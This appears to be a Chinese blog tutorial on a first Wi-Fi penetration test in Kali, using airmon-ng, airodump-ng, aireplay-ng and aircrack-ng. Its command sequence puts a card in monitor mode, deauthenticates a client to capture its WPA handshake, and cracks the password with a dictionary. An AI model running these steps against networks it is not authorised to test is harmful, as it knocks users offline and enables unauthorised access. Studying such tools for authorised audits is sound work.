Kali 2 | 用airmon-ng开始我的第一次无线渗透测试



说明

  • 虚拟机装的是Kali官网下载的VM的1902Kali镜像包,用Xshell连接操作

  • USB无线网卡使用的是某东上搜索CDLinux找到的免驱Ralink 802.11n

  • airmon-ng有个局限:
    必须扫描到路由器MAC地址和它的连接设备的MAC地址才可以破解,即若只有路由器MAC地址,却没有连接的设备,那就是不行的.


开始

  • 接入无线网卡

1.快速运行

网卡分类 快速运行命令
RTL8812au芯片网卡推荐 ifconfig wlan0 up
airmon-ng check kill
airodump-ng wlan0
一般网卡 ifconfig wlan0 up
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

2. 完整运行

  • 查看网卡信息

airmon-ng

iwconfig


ifconfig -a

  • 激活网卡
    ifconfig wlan0 up

  • 关掉干扰进程
    airmon-ng check kill

  • 刷新下网卡驱动缓存(可选)
    rfkill block wifi
    rfkill unblock wifi

  • 开启监听模式
    airmon-ng start wlan0

  • 验证监听模式开启
    iwconfig

airmon-ng

  • 扫描WiFi
    airodump-ng wlan0mon
  • 针对要破解的WiFi重新开启监听记录,发送断开命令,等待客户端重新连接时监听密码包

格式:airodump-ng -w [文件名](用来保存监听到的数据) -c [监听频道] wlan0mon

airodump-ng -w 51pwd -c 1 wlan0mon

  • 打开另一个shell窗口运行(强制断开连接到路由器的设备,以便在它再次连接时捕获它的认证包)

格式:aireplay-ng -0 1 -a [路由器的MAC地址] -c [客户端的MAC地址] wlan0mon

  • 跑包测试加密的无线密码

格式:aircrack-ng -w [准备好的密码字典] [捕获到的数据包]

参阅:

  • 37实验室
  • 无线安全审计工具aircrack-ng详解

更新中......


你可能感兴趣的:(Kali 2 | 用airmon-ng开始我的第一次无线渗透测试)